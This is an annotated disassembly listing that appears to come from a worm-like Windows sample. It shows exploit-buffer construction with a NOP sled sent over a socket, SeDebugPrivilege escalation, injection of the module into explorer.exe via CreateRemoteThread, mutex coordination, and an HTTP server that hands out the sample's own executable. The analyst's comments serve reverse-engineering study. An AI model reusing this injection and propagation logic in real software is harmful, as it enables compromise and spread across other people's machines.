                call    sub_31002B8C ; memset    (var_2CD8 = NOP * 0DACh)
                push    4
                lea     eax, [ebp+var_24F4]     ; sled + 7E4h
                push    offset dword_31004940
                push    eax
                call    sub_31002B98 ; memcpy
                push    offset byte_31004000
                call    sub_31002B92 ; strlen
                push    eax
                lea     eax, [ebp+var_24E4]     ; sled + 7F4h
                push    offset byte_31004000
                push    eax
                call    sub_31002B98 ; memcpy
                push    4
                lea     eax, [ebp+var_21C0]     ; sled + 0B18h
                push    offset loc_310049B8
                push    eax
                call    sub_31002B98 ; memcpy
                push    4
                lea     eax, [ebp+var_21BC]     ; sled + 0B1Ch
                push    offset dword_31004940
                push    eax
                call    sub_31002B98 ; memcpy
                add     esp, 40h
                push    offset byte_31004000
                call    sub_31002B92 ; strlen
                push    eax
                lea     eax, [ebp+var_21B0]     ; sled + 0B28h
                push    offset byte_31004000
                push    eax
                call    sub_31002B98 ; memcpy
                add     esp, 10h
                xor     ecx, ecx
                lea     eax, [ebp+var_4833]
loc_310016F4:                           ; CODE XREF: sub_31001262+4A8j
                                        ; var_4834[2*i] = var_2CD8[i], var_4834[2*i+1] = 0
                mov     dl, [ebp+ecx+var_2CD8]
                mov     [eax-1], dl
                and     byte ptr [eax], 0
                inc     ecx
                inc     eax
                inc     eax
                cmp     ecx, 0DACh
                jl      short loc_310016F4
                and     [ebp+var_2CDC], 0       ; wide NUL terminator
                and     [ebp+var_2CDB], 0
                push    1C52h
                lea     eax, [ebp+var_89E4]
                push    31h
                push    eax
                call    sub_31002B8C ; memset    (buffer 1 = '1' * 1C52h)
                push    1C52h
                lea     eax, [ebp+var_690C]
                push    31h
                push    eax
                call    sub_31002B8C ; memset    (buffer 2 = '1' * 1C52h)
                add     esp, 18h
                jmp     loc_310014F9
; ---------------------------------------------------------------------------
loc_31001748:                           ; CODE XREF: sub_31001262+339j
                                        ; ---- branch A final build: header + sled + trailer
                push    7Ch
                lea     eax, [ebp+var_1F28]
                push    offset dword_31004654   ; header (7Ch bytes)
                push    eax
                call    sub_31002B98 ; memcpy
                lea     eax, [ebp+var_F44]
                push    7D0h
                push    eax
                lea     eax, [ebp+var_1EAC]     ; buffer + 7Ch
                push    eax
                call    sub_31002B98 ; memcpy
                push    90h
                lea     eax, [ebp+var_16DC]     ; buffer + 84Ch
                push    offset dword_310046D4   ; trailer (90h bytes)
                push    eax
                call    sub_31002B98 ; memcpy
                add     esp, 24h
                and     [ebp+var_1231], 0       ; buffer[0CF7h] = 0
                lea     eax, [ebp+var_1F28]
                push    0
                push    0CF8h
loc_310017A0:                           ; CODE XREF: sub_31001262+3F1j
                                        ; eax = final buffer, length already pushed
                push    eax
                push    [ebp+var_4]
                call    ebx ; send
                push    edi
                call    esi
                                        ; Sleep (label of the call esi that ends the previous line)
                and     [ebp+var_C], 0          ; final buffer sent: result = 0
loc_310017AD:                           ; CODE XREF: sub_31001262+1ADj
                                        ; sub_31001262+1E1j ...
                push    2                       ; SD_BOTH
                push    [ebp+var_4]
                call    dword_31001170 ; shutdown
loc_310017B8:                           ; CODE XREF: sub_31001262+166j
                push    [ebp+var_4]
                call    dword_31001174 ; closesocket
                pop     esi
loc_310017C2:                           ; CODE XREF: sub_31001262+37j
                mov     eax, [ebp+var_C]        ; 0 = delivered, 1 = failed somewhere
                pop     edi
                pop     ebx
                leave
                retn
sub_31001262    endp

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
;
; void sub_310017C9(void) -- enable SeDebugPrivilege on the current process
; token (used by the injector sub_31001851, which is called right after this
; from loc_31001DCA).  OpenProcessToken / LookupPrivilegeValueA /
; AdjustTokenPrivileges are resolved from advapi32 by name; the 10h-byte
; TOKEN_PRIVILEGES is {PrivilegeCount=1, Luid, Attributes=2
; (SE_PRIVILEGE_ENABLED)}.
; Observations: none of the three API results is checked, the token handle
; in var_C is never closed, and eax on return is incidental (the caller
; ignores it).
sub_310017C9    proc near               ; CODE XREF: UPX0:loc_31001DCAp
var_1C          = dword ptr -1Ch        ; TOKEN_PRIVILEGES.PrivilegeCount
var_18          = byte ptr -18h         ; TOKEN_PRIVILEGES.Privileges[0].Luid (8 bytes)
var_10          = dword ptr -10h        ; TOKEN_PRIVILEGES.Privileges[0].Attributes
var_C           = dword ptr -0Ch        ; hToken
var_8           = dword ptr -8          ; LookupPrivilegeValueA
var_4           = dword ptr -4          ; OpenProcessToken
                push    ebp
                mov     ebp, esp
                sub     esp, 1Ch
                push    esi
                push    edi
                push    offset aAdvapi32 ; "advapi32"
                call    dword_31001090 ; LoadLibraryA
                mov     esi, dword_3100108C     ; esi = GetProcAddress
                mov     edi, eax                ; edi = advapi32 base
                push    offset aOpenprocesstok ; "OpenProcessToken"
                push    edi
                call    esi ; GetProcAddress
                test    eax, eax
                mov     [ebp+var_4], eax
                jz      short loc_3100184D
                push    offset aLookupprivileg ; "LookupPrivilegeValueA"
                push    edi
                call    esi ; GetProcAddress
                test    eax, eax
                mov     [ebp+var_8], eax
                jz      short loc_3100184D
                push    offset aAdjusttokenpri ; "AdjustTokenPrivileges"
                push    edi
                call    esi ; GetProcAddress
                mov     esi, eax                ; esi = AdjustTokenPrivileges from here on
                test    esi, esi
                jz      short loc_3100184D
                lea     eax, [ebp+var_C]
                push    eax                     ; TokenHandle out
                push    20h                     ; TOKEN_ADJUST_PRIVILEGES
                call    dword_31001088 ; GetCurrentProcess
                push    eax
                call    [ebp+var_4]             ; OpenProcessToken(GetCurrentProcess(), 20h, &hToken)
                lea     eax, [ebp+var_18]
                mov     [ebp+var_1C], 1         ; PrivilegeCount = 1
                push    eax                     ; lpLuid
                push    offset aSedebugprivile ; "SeDebugPrivilege"
                push    0                       ; lpSystemName = NULL
                mov     [ebp+var_10], 2         ; Attributes = SE_PRIVILEGE_ENABLED
                call    [ebp+var_8]             ; LookupPrivilegeValueA
                push    0                       ; ReturnLength = NULL
                push    0                       ; PreviousState = NULL
                lea     eax, [ebp+var_1C]
                push    10h                     ; BufferLength = sizeof(TOKEN_PRIVILEGES)
                push    eax                     ; NewState
                push    0                       ; DisableAllPrivileges = FALSE
                push    [ebp+var_C]             ; hToken
                call    esi ; AdjustTokenPrivileges  (IDA's stale "GetProcAddress" label was wrong: esi was reassigned above)
loc_3100184D:                           ; CODE XREF: sub_310017C9+28j
                                        ; sub_310017C9+37j ...
                pop     edi
                pop     esi
                leave
                retn
sub_310017C9    endp

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
;
; int __cdecl sub_31001851(LPTHREAD_START_ROUTINE entry) -- process injection.
;   Copies this module's whole image into the process that owns the
;   "Shell_TrayWnd" window (the taskbar window class, owned by explorer.exe;
;   falls back to the foreground window's owner) at the SAME virtual address
;   it has here, then starts `entry` in that process with thread parameter 1.
;   The caller at loc_31001DCA passes sub_31001E06.
;   Image base / size are read from this module's PE header:
;     dword_31004FD0 (module handle) -> e_lfanew (+3Ch) -> NT headers;
;     OptionalHeader.ImageBase at +34h, OptionalHeader.SizeOfImage at +50h.
;   OpenProcess access 42Ah = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |
;     PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION.
;   VirtualAllocEx(hProc, ImageBase, SizeOfImage, 3000h = MEM_COMMIT|
;     MEM_RESERVE, 4 = PAGE_READWRITE): the remote thread then runs out of
;     read/write memory, which only works where DEP is not enforced.
; Returns 0 = injected; 1 = VirtualAllocEx/CreateRemoteThread not resolved;
; 2 = no target window; 3 = OpenProcess failed; 4 = VirtualAllocEx failed;
; 5 = CreateRemoteThread failed (the "uterm13" mutex is recreated first).
; Observations: WriteProcessMemory's result is not checked; the "uterm13"
; mutex handle dword_31004FC4 is closed before the remote thread is created
; (presumably so the injected copy can own that mutex -- see sub_31001E06).
sub_31001851    proc near               ; CODE XREF: UPX0:31001DDEp
var_18          = byte ptr -18h         ; remote thread id (out)
var_14          = dword ptr -14h        ; CreateRemoteThread
var_10          = dword ptr -10h        ; VirtualAllocEx; later reused as bytes-written out
var_C           = dword ptr -0Ch        ; ImageBase
var_8           = dword ptr -8          ; target PID
var_4           = dword ptr -4          ; return code
arg_0           = dword ptr 8           ; remote entry point
                push    ebp
                mov     ebp, esp
                sub     esp, 18h
                mov     ecx, dword_31004FD0     ; ecx = own module base (set at loc_31001D88)
                and     [ebp+var_4], 0
                push    ebx
                push    esi
                mov     eax, [ecx+3Ch]          ; e_lfanew
                push    edi
                add     eax, ecx                ; eax = IMAGE_NT_HEADERS
                push    offset aKernel32 ; "kernel32"
                mov     ecx, [eax+34h]          ; OptionalHeader.ImageBase
                mov     edi, [eax+50h]          ; edi = OptionalHeader.SizeOfImage
                mov     [ebp+var_C], ecx
                call    dword_310010A0 ; GetModuleHandleA
                mov     esi, dword_3100108C     ; esi = GetProcAddress
                mov     ebx, eax                ; ebx = kernel32 base
                push    offset aVirtualallocex ; "VirtualAllocEx"
                push    ebx
                call    esi ; GetProcAddress
                test    eax, eax
                mov     [ebp+var_10], eax
                jnz     short loc_31001898
loc_31001894:                           ; CODE XREF: sub_31001851+54j
                push    1                       ; return 1: API not resolved
                jmp     short loc_310018E9
; ---------------------------------------------------------------------------
loc_31001898:                           ; CODE XREF: sub_31001851+41j
                push    offset aCreateremoteth ; "CreateRemoteThread"
                push    ebx
                call    esi ; GetProcAddress
                test    eax, eax
                mov     [ebp+var_14], eax
                jz      short loc_31001894
                push    0
                push    offset aShell_traywnd ; "Shell_TrayWnd"
                call    dword_31001110 ; FindWindowA
                test    eax, eax
                jnz     short loc_310018C6
                call    dword_31001114 ; GetForegroundWindow
                test    eax, eax
                jnz     short loc_310018C6
                push    2                       ; return 2: no target window
                jmp     short loc_310018E9
; ---------------------------------------------------------------------------
loc_310018C6:                           ; CODE XREF: sub_31001851+65j
                                        ; sub_31001851+6Fj
                lea     ecx, [ebp+var_8]
                push    ecx                     ; lpdwProcessId
                push    eax                     ; hWnd
                call    dword_31001118 ; GetWindowThreadProcessId
                push    [ebp+var_8]             ; dwProcessId
                push    0                       ; bInheritHandle = FALSE
                push    42Ah                    ; CREATE_THREAD|VM_OPERATION|VM_WRITE|QUERY_INFORMATION
                call    dword_3100109C ; OpenProcess
                mov     ebx, eax                ; ebx = hProcess
                test    ebx, ebx
                jnz     short loc_310018EC
                push    3                       ; return 3: OpenProcess failed
loc_310018E9:                           ; CODE XREF: sub_31001851+45j
                                        ; sub_31001851+73j
                pop     eax
                jmp     short loc_31001957
; ---------------------------------------------------------------------------
loc_310018EC:                           ; CODE XREF: sub_31001851+94j
                push    4                       ; flProtect = PAGE_READWRITE
                push    3000h                   ; MEM_COMMIT | MEM_RESERVE
                push    edi                     ; dwSize = SizeOfImage
                push    [ebp+var_C]             ; lpAddress = own ImageBase
                push    ebx                     ; hProcess
                call    [ebp+var_10]            ; VirtualAllocEx
                mov     esi, dword_31001098     ; esi = CloseHandle
                test    eax, eax
                jz      short loc_3100194A
                lea     ecx, [ebp+var_10]
                push    ecx                     ; lpNumberOfBytesWritten (clobbers the VirtualAllocEx slot)
                push    edi                     ; nSize = SizeOfImage
                push    eax                     ; lpBuffer = same address in THIS process = own image
                push    eax                     ; lpBaseAddress = remote allocation
                push    ebx
                call    dword_31001094 ; WriteProcessMemory   (result unchecked)
                push    dword_31004FC4          ; "uterm13" mutex handle
                call    esi ; CloseHandle
                lea     eax, [ebp+var_18]
                xor     edi, edi
                push    eax                     ; lpThreadId
                push    edi                     ; dwCreationFlags = 0
                push    1                       ; lpParameter = 1
                push    [ebp+arg_0]             ; lpStartAddress = entry
                push    edi                     ; dwStackSize = 0
                push    edi                     ; lpThreadAttributes = NULL
                push    ebx                     ; hProcess
                call    [ebp+var_14]            ; CreateRemoteThread
                cmp     eax, edi
                jz      short loc_31001936
                push    eax
                call    esi ; CloseHandle        (thread handle)
                jmp     short loc_31001951
; ---------------------------------------------------------------------------
loc_31001936:                           ; CODE XREF: sub_31001851+DEj
                push    offset aUterm13 ; "uterm13"
                call    sub_3100198A            ; re-create the mutex we just closed
                pop     ecx
                mov     [ebp+var_4], 5          ; return 5: CreateRemoteThread failed
                jmp     short loc_31001951
; ---------------------------------------------------------------------------
loc_3100194A:                           ; CODE XREF: sub_31001851+B2j
                mov     [ebp+var_4], 4          ; return 4: VirtualAllocEx failed
loc_31001951:                           ; CODE XREF: sub_31001851+E3j
                                        ; sub_31001851+F7j
                push    ebx
                call    esi ; CloseHandle        (process handle)
                mov     eax, [ebp+var_4]
loc_31001957:                           ; CODE XREF: sub_31001851+99j
                pop     edi
                pop     esi
                pop     ebx
                leave
                retn
sub_31001851    endp

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
;
; void sub_3100195C(void) -- srand(GetTickCount() + esp * rdtsc_low).
; NOTE(review): this seeds the CRT rand() that produces the HTTP listen port
; (sub_31001C18) and the random names from sub_310019D4; tick count and a
; stack pointer are low-entropy, so those values are guessable.
sub_3100195C    proc near               ; CODE XREF: sub_31001C18+Bp
                                        ; UPX0:31001DA0p ...
var_8           = dword ptr -8          ; low dword of rdtsc
var_4           = dword ptr -4          ; esp snapshot
                push    ebp
                mov     ebp, esp
                push    ecx
                push    ecx
                push    ebx
                push    esi
                push    edi
                pusha
                rdtsc
                mov     [ebp+var_8], eax        ; saved before popa restores eax
                popa
                mov     [ebp+var_4], esp
                call    dword_310010A4 ; GetTickCount
                mov     ecx, [ebp+var_4]
                imul    ecx, [ebp+var_8]
                add     eax, ecx
                push    eax
                call    dword_310010FC ; srand
                pop     ecx
                pop     edi
                pop     esi
                pop     ebx
                leave
                retn
sub_3100195C    endp

; =============== S U B R O U T I N E =======================================
;
; HANDLE __cdecl sub_3100198A(LPCSTR name) -- CreateMutexA(NULL, TRUE, name).
; The caller inspects RtlGetLastWin32Error for ERROR_ALREADY_EXISTS itself
; (see loc_31001D88); the handle is returned, never closed here.
sub_3100198A    proc near               ; CODE XREF: sub_31001851+EAp
                                        ; UPX0:31001DAAp ...
arg_0           = dword ptr 4
                push    [esp+arg_0]             ; lpName
                push    1                       ; bInitialOwner = TRUE
                push    0                       ; lpMutexAttributes = NULL
                call    dword_310010A8 ; CreateMutexA
                retn
sub_3100198A    endp

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
;
; HANDLE __cdecl sub_31001999(LPTHREAD_START_ROUTINE fn, LPVOID param)
; CreateThread(NULL, 0, fn, param, 0, &tid) where the thread id is written
; over the arg_4 stack slot.  The handle is returned unclosed (compare
; sub_310019B3, which closes it).
sub_31001999    proc near               ; CODE XREF: sub_31001E06+E3p
                                        ; sub_31001E06+EEp ...
arg_0           = dword ptr 8           ; thread routine
arg_4           = dword ptr 0Ch         ; thread parameter; slot reused as lpThreadId
                push    ebp
                mov     ebp, esp
                lea     eax, [ebp+arg_4]
                push    eax                     ; lpThreadId = &arg_4
                xor     eax, eax
                push    eax                     ; dwCreationFlags = 0
                push    [ebp+arg_4]             ; lpParameter
                push    [ebp+arg_0]             ; lpStartAddress
                push    eax                     ; dwStackSize = 0
                push    eax                     ; lpThreadAttributes = NULL
                call    dword_310010AC ; CreateThread
                pop     ebp
                retn                            ; eax = thread handle (not closed)
sub_31001999    endp

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
;
; void __cdecl sub_310019B3(LPTHREAD_START_ROUTINE fn, LPVOID param)
; Fire-and-forget CreateThread: identical to sub_31001999 but the thread
; handle is closed immediately.  Return value is CloseHandle's BOOL.
sub_310019B3    proc near               ; CODE XREF: sub_31001C18+12Cp
                                        ; sub_31001FA5+5Ap ...
arg_0           = dword ptr 8
arg_4           = dword ptr 0Ch
                push    ebp
                mov     ebp, esp
                lea     eax, [ebp+arg_4]
                push    eax                     ; lpThreadId = &arg_4
                xor     eax, eax
                push    eax
                push    [ebp+arg_4]
                push    [ebp+arg_0]
                push    eax
                push    eax
                call    dword_310010AC ; CreateThread
                push    eax
                call    dword_31001098 ; CloseHandle
                pop     ebp
                retn
sub_310019B3    endp

; =============== S U B R O U T I N E =======================================
;
; void __cdecl sub_310019D4(char *buf, int n) -- fill buf with n random
; lowercase letters (rand() % 26 + 'a') and NUL-terminate at buf[n].
; rand() is seeded by sub_3100195C (tick count / esp), so the names are
; predictable.  n <= 0 writes only the NUL -- at buf[n], i.e. before the
; buffer when n is negative; callers (sub_31002476, sub_31002542) are
; outside this view.
sub_310019D4    proc near               ; CODE XREF: sub_31002476+3Bp
                                        ; sub_31002542+64p ...
arg_0           = dword ptr 4
arg_4           = dword ptr 8
                push    ebx
                mov     ebx, [esp+4+arg_0]      ; ebx = buf
                push    esi
                push    edi
                mov     edi, [esp+0Ch+arg_4]    ; edi = n
                xor     esi, esi                ; esi = i
                test    edi, edi
                jle     short loc_310019FC
loc_310019E5:                           ; CODE XREF: sub_310019D4+26j
                call    dword_310010F8 ; rand
                push    1Ah
                cdq
                pop     ecx
                idiv    ecx                     ; edx = rand() % 26
                add     dl, 61h                 ; + 'a'
                mov     [esi+ebx], dl
                inc     esi
                cmp     esi, edi
                jl      short loc_310019E5
loc_310019FC:                           ; CODE XREF: sub_310019D4+Fj
                and     byte ptr [ebx+edi], 0   ; buf[n] = 0
                pop     edi
                pop     esi
                pop     ebx
                retn
sub_310019D4    endp

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
;
; BOOL __cdecl sub_31001A04(LPSTR cmdline, WORD showWindow)
; CreateProcessA(NULL, cmdline, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)
; with a zeroed 44h-byte STARTUPINFOA whose cb and wShowWindow (+30h) are
; set; both PROCESS_INFORMATION handles are closed.  Returns the
; CreateProcessA BOOL.
; NOTE(review): si.dwFlags (+2Ch) is left 0, so STARTF_USESHOWWINDOW is not
; set and the showWindow argument has no effect.
sub_31001A04    proc near               ; CODE XREF: sub_310026A6+105p
var_54          = dword ptr -54h        ; STARTUPINFOA (44h bytes); .cb
var_24          = word ptr -24h         ; STARTUPINFOA.wShowWindow
var_10          = dword ptr -10h        ; PROCESS_INFORMATION.hProcess
var_C           = dword ptr -0Ch        ; PROCESS_INFORMATION.hThread
arg_0           = dword ptr 8
arg_4           = word ptr 0Ch
                push    ebp
                mov     ebp, esp
                sub     esp, 54h
                push    esi
                push    edi
                push    44h
                xor     esi, esi
                pop     edi                     ; edi = 44h = sizeof(STARTUPINFOA)
                lea     eax, [ebp+var_54]
                push    edi
                push    esi
                push    eax
                call    sub_31002B8C ; memset    (si = {0})
                mov     ax, [ebp+arg_4]
                add     esp, 0Ch
                mov     [ebp+var_24], ax        ; si.wShowWindow = showWindow (ignored, dwFlags = 0)
                lea     eax, [ebp+var_10]
                push    eax                     ; lpProcessInformation
                lea     eax, [ebp+var_54]
                push    eax                     ; lpStartupInfo
                push    esi                     ; lpCurrentDirectory = NULL
                push    esi                     ; lpEnvironment = NULL
                push    esi                     ; dwCreationFlags = 0
                push    esi                     ; bInheritHandles = FALSE
                push    esi                     ; lpThreadAttributes = NULL
                push    esi                     ; lpProcessAttributes = NULL
                mov     [ebp+var_54], edi       ; si.cb = 44h
                push    [ebp+arg_0]             ; lpCommandLine
                push    esi                     ; lpApplicationName = NULL
                call    dword_310010B0 ; CreateProcessA
                push    [ebp+var_C]
                mov     esi, dword_31001098     ; esi = CloseHandle
                mov     edi, eax                ; edi = BOOL result
                call    esi ; CloseHandle        (hThread)
                push    [ebp+var_10]
                call    esi ; CloseHandle        (hProcess)
                mov     eax, edi
                pop     edi
                pop     esi
                leave
                retn
sub_31001A04    endp

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
;
; DWORD sub_31001A5A(void) -- this host's IPv4 address in network byte order:
; gethostname() then gethostbyname()->h_addr_list[0].  Returns 0 if
; gethostname fails (WSAGetLastError is called but its value is discarded)
; and 100007Fh (127.0.0.1) if gethostbyname returns NULL.  h_addr_list[0]
; itself is not checked for NULL.
sub_31001A5A    proc near               ; CODE XREF: sub_3100202D+3Ep
                                        ; sub_310020F4+7p ...
var_34          = byte ptr -34h         ; host name buffer (34h bytes, 31h passed)
                push    ebp
                mov     ebp, esp
                sub     esp, 34h
                lea     eax, [ebp+var_34]
                push    31h
                push    eax
                call    dword_3100114C ; gethostname
                cmp     eax, 0FFFFFFFFh
                jnz     short loc_31001A7B
                call    dword_31001150 ; WSAGetLastError  (result unused)
                xor     eax, eax
                leave
                retn
; ---------------------------------------------------------------------------
loc_31001A7B:                           ; CODE XREF: sub_31001A5A+15j
                lea     eax, [ebp+var_34]
                push    eax
                call    dword_31001154 ; gethostbyname
                test    eax, eax
                jnz     short loc_31001A90
                mov     eax, 100007Fh           ; 127.0.0.1
                leave
                retn
; ---------------------------------------------------------------------------
loc_31001A90:                           ; CODE XREF: sub_31001A5A+2Dj
                mov     eax, [eax+0Ch]          ; hostent.h_addr_list
                mov     eax, [eax]              ; h_addr_list[0]
                mov     eax, [eax]              ; first 4 bytes = in_addr
                leave
                retn
sub_31001A5A    endp

; =============== S U B R O U T I N E =======================================
;
; int sub_31001A99(void) -- 1 if InternetGetConnectedState(&flags, 0) is
; TRUE, else 0 (the flags are discarded).
sub_31001A99    proc near               ; CODE XREF: sub_31001F41+22p
                                        ; sub_31001FA5+27p ...
var_4           = byte ptr -4
                push    ecx
                lea     eax, [esp+4+var_4]
                push    0
                push    eax                     ; lpdwFlags
                call    dword_31001134 ; InternetGetConnectedState
                neg     eax
                sbb     eax, eax
                neg     eax                     ; normalise BOOL to 0/1
                pop     ecx
                retn
sub_31001A99    endp

; =============== S U B R O U T I N E =======================================
;
; void __cdecl sub_31001AAF(LPCSTR eventName) -- if a named event exists,
; open it with EVENT_MODIFY_STATE (2) and set it.  The handle is never
; closed.  sub_31001E06 calls this for "u10x"/"u11x"/"u12x".
sub_31001AAF    proc near               ; CODE XREF: sub_31001E06+40p
                                        ; sub_31001E06+4Cp ...
arg_0           = dword ptr 4
                push    [esp+arg_0]             ; lpName
                push    0                       ; bInheritHandle = FALSE
                push    2                       ; EVENT_MODIFY_STATE
                call    dword_310010B8 ; OpenEventA
                test    eax, eax
                jz      short locret_31001AC8
                push    eax
                call    dword_310010B4 ; SetEvent    (handle leaked)
locret_31001AC8:                        ; CODE XREF: sub_31001AAF+10j
                retn
sub_31001AAF    endp

; =============== S U B R O U T I N E =======================================
;
; DWORD sub_31001AC9(void) -- (rand() << 16) | rand().  With the CRT's
; 15-bit rand() this leaves bits 15 and 31 clear; still seeded by
; sub_3100195C, so not suitable as a secret.
sub_31001AC9    proc near               ; CODE XREF: UPX0:31002B69p
                push    esi
                mov     esi, dword_310010F8     ; esi = rand
                push    edi
                call    esi ; rand
                mov     edi, eax
                shl     edi, 10h
                call    esi ; rand
                or      eax, edi
                pop     edi
                pop     esi
                retn
sub_31001AC9    endp

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
;
; DWORD WINAPI sub_31001ADF(SOCKET s) -- per-connection thread started by
; sub_31001C18's accept loop (stdcall, retn 4).  Minimal HTTP responder:
;   recv up to 100h bytes; if the request contains "GET" and ".exe", send
;   the 3Dh-byte "HTTP/1.1 200 OK\r\nContent-Type: applicat..." header, a
;   "Content-Length: %u\r\n\r\n" line with dword_31004FC0, then the buffer
;   at dword_31004FB8 in 1000h-byte chunks with Sleep(64h) between chunks.
;   Any other request gets "HTTP/1.1 200 OK\r\n\r\n\r\n" plus 3 bytes from
;   dword_31004A80.  Ends with Sleep(7D0h), shutdown, closesocket,
;   ExitThread(0).
; Observations:
;   * var_100 is neither zeroed nor NUL-terminated after recv, so strstr can
;     read past the 100h-byte request into the rest of the frame; a 0-byte
;     recv (peer closed) also reaches strstr on uninitialised stack.
;   * the recv-failed (return 1) and send-failed (return 2) paths skip
;     shutdown/closesocket, leaking the accepted socket.
;   * a partial send of less than 1000h bytes ends the transfer early.
sub_31001ADF    proc near               ; DATA XREF: sub_31001C18+127o
var_200         = byte ptr -200h        ; Content-Length line
var_100         = byte ptr -100h        ; request bytes (no terminator)
arg_0           = dword ptr 8           ; accepted SOCKET
                push    ebp
                mov     ebp, esp
                sub     esp, 200h
                push    ebx
                mov     ebx, [ebp+arg_0]        ; ebx = s
                push    esi
                push    edi
                xor     edi, edi                ; edi = bytes of body sent so far
                lea     eax, [ebp+var_100]
                push    edi                     ; flags = 0
                push    100h
                push    eax
                push    ebx
                call    dword_3100116C ; recv
                cmp     eax, 0FFFFFFFFh
                jnz     short loc_31001B10
                push    1                       ; return 1: recv failed (socket not closed)
                jmp     loc_31001BCB
; ---------------------------------------------------------------------------
loc_31001B10:                           ; CODE XREF: sub_31001ADF+28j
                mov     esi, dword_310010F4     ; esi = strstr
                lea     eax, [ebp+var_100]
                push    offset aGet ; "GET"
                push    eax
                call    esi ; strstr              (unterminated buffer, see header note)
                pop     ecx
                test    eax, eax
                pop     ecx
                jz      loc_31001BCE
                lea     eax, [ebp+var_100]
                push    offset a_exe ; ".exe"
                push    eax
                call    esi ; strstr
                pop     ecx
                test    eax, eax
                pop     ecx
                jz      loc_31001BCE
                mov     esi, dword_31001168     ; esi = send
                push    0
                push    3Dh
                push    offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
                push    ebx
                call    esi ; send
                push    dword_31004FC0          ; file size set by sub_31001C18
                lea     eax, [ebp+var_200]
                push    offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
                push    eax
                call    dword_3100111C ; wsprintfA
                add     esp, 0Ch
                lea     eax, [ebp+var_200]
                push    0                       ; send flags, kept below strlen's arg
                push    eax
                call    sub_31002B92 ; strlen
                pop     ecx
                push    eax                     ; len
                lea     eax, [ebp+var_200]
                push    eax
                push    ebx
                call    esi ; send
loc_31001B8D:                           ; CODE XREF: sub_31001ADF+E8j
                                        ; chunk = min(size - sent, 1000h)
                mov     eax, dword_31004FC0
                mov     ecx, 1000h
                sub     eax, edi
                cmp     eax, ecx
                jb      short loc_31001B9F
                mov     eax, ecx
loc_31001B9F:                           ; CODE XREF: sub_31001ADF+BCj
                test    eax, eax
                jz      short loc_31001BEC      ; all sent
                push    0
                push    eax
                mov     eax, dword_31004FB8     ; file buffer set by sub_31001C18
                add     eax, edi
                push    eax
                push    ebx
                call    esi ; send
                cmp     eax, 0FFFFFFFFh
                jz      short loc_31001BC9
                cmp     eax, 1000h
                jb      short loc_31001BEC      ; short send: stop (also the normal last chunk)
                push    64h
                add     edi, eax
                call    dword_31001080 ; Sleep   (100 ms between chunks)
                jmp     short loc_31001B8D
; ---------------------------------------------------------------------------
loc_31001BC9:                           ; CODE XREF: sub_31001ADF+D5j
                push    2                       ; return 2: send failed (socket not closed)
loc_31001BCB:                           ; CODE XREF: sub_31001ADF+2Cj
                pop     eax
                jmp     short loc_31001C11
; ---------------------------------------------------------------------------
loc_31001BCE:                           ; CODE XREF: sub_31001ADF+49j
                                        ; sub_31001ADF+61j
                mov     esi, dword_31001168
                push    0
                push    15h
                push    offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
                push    ebx
                call    esi ; send
                push    0
                push    3
                push    offset dword_31004A80   ; 3-byte body, contents outside this view
                push    ebx
                call    esi ; send
loc_31001BEC:                           ; CODE XREF: sub_31001ADF+C2j
                                        ; sub_31001ADF+DCj
                push    7D0h
                call    dword_31001080 ; Sleep   (2 s before closing)
                push    2                       ; SD_BOTH
                push    ebx
                call    dword_31001170 ; shutdown
                push    ebx
                call    dword_31001174 ; closesocket
                push    0
                call    dword_310010BC ; ExitThread
                xor     eax, eax                ; not reached
loc_31001C11:                           ; CODE XREF: sub_31001ADF+EDj
                pop     edi
                pop     esi
                pop     ebx
                leave
                retn    4
sub_31001ADF    endp

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
;
; DWORD WINAPI sub_31001C18(LPVOID unused) -- HTTP-serving thread (started
; from sub_31001E06 via sub_31001999).
;   1. sub_31002264(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\
;      CurrentVersi...", "Windows Update", var_130, 104h): by its
;      RegOpenKeyExA/RegCloseKey cross-references a registry read; the value
;      is used below as a file path (presumably the dropped copy of this
;      sample -- confirm in sub_31002264/sub_310026A6, outside this view).
;      Non-zero return -> ExitThread(0) at loc_31001D4D.
;   2. Opens that file read-only, reads it whole into a buffer obtained from
;      sub_31002680(size) (allocator, outside this view):
;      dword_31004FB8 = data, dword_31004FC0 = bytes actually read.
;   3. Binds a TCP socket on INADDR_ANY and a pseudo-random port chosen at
;      loc_31001CE6 (rand() seeded by sub_3100195C), publishes the port in
;      dword_31004FCC, listens with backlog 64h and starts sub_31001ADF for
;      every accept() -- forever; the code after the loop is unreachable.
; Observations: socket(), sub_31002680(), ReadFile() and accept() results
; are not checked; if ReadFile fails, var_4 is uninitialised and becomes the
; advertised Content-Length; dword_31004FBC is cleared here for a reason not
; visible in this view.
sub_31001C18    proc near               ; DATA XREF: sub_31001E06+DEo
var_130         = byte ptr -130h        ; file path from the registry (104h bytes)
var_28          = byte ptr -28h         ; accept() peer address
var_18          = word ptr -18h         ; sockaddr_in.sin_family
var_16          = word ptr -16h         ; sockaddr_in.sin_port
var_14          = dword ptr -14h        ; sockaddr_in.sin_addr
var_8           = dword ptr -8          ; accept() addrlen
var_4           = dword ptr -4          ; ReadFile bytes read
                push    ebp
                mov     ebp, esp
                sub     esp, 130h
                push    ebx
                push    edi
                call    sub_3100195C            ; seed rand()
                lea     eax, [ebp+var_130]
                push    104h
                push    eax
                push    offset aWindowsUpdate ; "Windows Update"
                xor     ebx, ebx                ; ebx = 0
                push    offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
                push    80000002h               ; HKEY_LOCAL_MACHINE
                mov     dword_31004FBC, ebx
                call    sub_31002264
                add     esp, 14h
                test    eax, eax
                jnz     loc_31001D4D
                push    esi
